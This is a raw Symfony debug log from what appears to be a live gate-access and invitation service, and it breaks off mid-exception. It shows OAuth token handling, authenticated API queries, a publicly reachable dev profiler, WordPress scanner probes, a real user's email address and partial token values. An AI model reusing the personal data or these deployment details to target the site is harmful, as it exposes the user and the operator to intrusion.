[2025-12-21 00:14:38] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c07d72","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/c07d72?panel=time","method":"GET"} []
[2025-12-21 00:14:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-21 00:17:47] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-21 00:18:06] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-21 00:19:36] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8ae359","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/8ae359?panel=cache","method":"GET"} []
[2025-12-21 00:19:36] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-21 00:19:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //feed/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //feed/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:19:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //blog/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //blog/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:19:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //web/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //web/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:19:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //wordpress/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //wordpress/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:19:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //wp/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //wp/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:19:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //2020/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //2020/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:19:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //2019/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //2019/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:19:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //2021/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //2021/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:19:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //shop/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //shop/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:19:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //wp1/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //wp1/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:19:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //test/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //test/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:19:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //site/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //site/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:19:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //cms/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //cms/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:20:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fa8c04","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/fa8c04?panel=validator","method":"GET"} []
[2025-12-21 00:20:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
[2025-12-21 00:26:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cc2d11","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/cc2d11?panel=dump","method":"GET"} []
[2025-12-21 00:26:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-21 00:29:50] request.INFO: Matched route "oauth2_token". {"route":"oauth2_token","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\OauthController::tokenAction","domain":"auth.unda.co","_route":"oauth2_token"},"request_uri":"https://auth.unda.co/oauth2/token","method":"POST"} []
[2025-12-21 00:29:50] php.INFO: User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead {"exception":"[object] (ErrorException(code: 0): User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead at /var/repositories/hona/vendor/doctrine/doctrine-bundle/Registry.php:62)"} []
[2025-12-21 00:29:50] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM refresh_token t0 WHERE t0.token = ? LIMIT 1 ["ac37f938310f627b158741a7fa [...]"] []
[2025-12-21 00:29:50] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-21 00:29:50] doctrine.DEBUG: INSERT INTO access_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"b3733e61425934f11fb43f9cbc [...]","3":"2025-12-21 00:59:50","4":"","5":398,"6":"[]"} []
[2025-12-21 00:29:50] doctrine.DEBUG: "COMMIT" [] []
[2025-12-21 00:29:50] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-21 00:29:50] doctrine.DEBUG: INSERT INTO refresh_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"9475b21af35afb95ae7be847dc [...]","3":"2026-02-19 00:29:50","4":"","5":398,"6":"[]"} []
[2025-12-21 00:29:50] doctrine.DEBUG: "COMMIT" [] []
[2025-12-21 00:29:50] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-21 00:29:50] doctrine.DEBUG: DELETE FROM refresh_token WHERE client_id = ? AND token = ? [0,"ac37f938310f627b158741a7fa [...]"] []
[2025-12-21 00:29:50] doctrine.DEBUG: "COMMIT" [] []
[2025-12-21 00:29:51] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
[2025-12-21 00:29:51] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-21 00:29:51] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:29:51] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:29:51] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:29:51] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
[2025-12-21 00:29:51] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:29:51] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:29:51] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:29:51] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:29:51] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
[2025-12-21 00:29:51] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
[2025-12-21 00:29:51] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
[2025-12-21 00:29:51] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
[2025-12-21 00:29:51] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-21 00:29:51] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [398,274] []
[2025-12-21 00:29:51] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-21 00:29:51] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"10","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"c95c459d-212c-4555-98e9-59cee00445e5","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/c95c459d-212c-4555-98e9-59cee00445e5/invitation/10/0?order=desc","method":"GET"} []
[2025-12-21 00:29:51] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-21 00:29:51] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:29:51] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:29:51] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:29:51] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
[2025-12-21 00:29:51] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:29:51] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:29:51] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:29:51] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:29:51] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-21 00:29:51] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
[2025-12-21 00:29:51] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-21 00:29:51] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
[2025-12-21 00:29:51] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 10 OFFSET 0 [274,1] []
[2025-12-21 00:29:51] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [274,1] []
[2025-12-21 00:29:51] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:29:51] request.INFO: Matched route "device_post_uuid". {"route":"device_post_uuid","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\DeviceController::devicePOSTAction","domain":"api.unda.co","_route":"device_post_uuid"},"request_uri":"https://api.unda.co/device","method":"POST"} []
[2025-12-21 00:29:51] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-21 00:29:51] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:29:51] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:29:51] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:29:51] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-21 00:29:51] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
[2025-12-21 00:29:51] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:29:51] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:29:51] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:29:51] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:29:51] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.guid AS guid_6, t0.endpoint_arn AS endpoint_arn_7, t0.token AS token_8, t0.identifier AS identifier_9, t0.model AS model_10, t0.os AS os_11, t0.app_version AS app_version_12, t0.arn_status AS arn_status_13, t0.type AS type_14, t0.app AS app_15, t0.user_id AS user_id_16 FROM device t0 WHERE t0.identifier = ? AND t0.type = ? AND t0.user_id = ? LIMIT 1 ["450EEF16-4822-4D9B-B6A0-EF [...]",1,398] []
[2025-12-21 00:29:51] request.CRITICAL: Uncaught PHP Exception Aws\Sns\Exception\SnsException: "Error executing "CreatePlatformEndpoint" on "https://sns.us-east-1.amazonaws.com"; AWS HTTP error: Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response: <ErrorResponse xmlns="http://sns.amazonaws.com/doc/2010-03-31/"> <Error> <Type>Sender</Type> <Code>InvalidClie (truncated...) InvalidClientTokenId (client): The security token included in the request is invalid. - <ErrorResponse xmlns="http://sns.amazonaws.com/doc/2010-03-31/"> <Error> <Type>Sender</Type> <Code>InvalidClientTokenId</Code> <Message>The security token included in the request is invalid.</Message> </Error> <RequestId>b600a070-65bd-5fc4-9d94-c1b12402b2c1</RequestId> </ErrorResponse> " at /var/repositories/hona/vendor/aws/aws-sdk-php/src/WrappedHttpHandler.php line 195 {"exception":"[object] (Aws\\Sns\\Exception\\SnsException(code: 0): Error executing \"CreatePlatformEndpoint\" on \"https://sns.us-east-1.amazonaws.com\"; AWS HTTP error: Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response:\n<ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n <Error>\n <Type>Sender</Type>\n <Code>InvalidClie (truncated...)\n InvalidClientTokenId (client): The security token included in the request is invalid. - <ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n <Error>\n 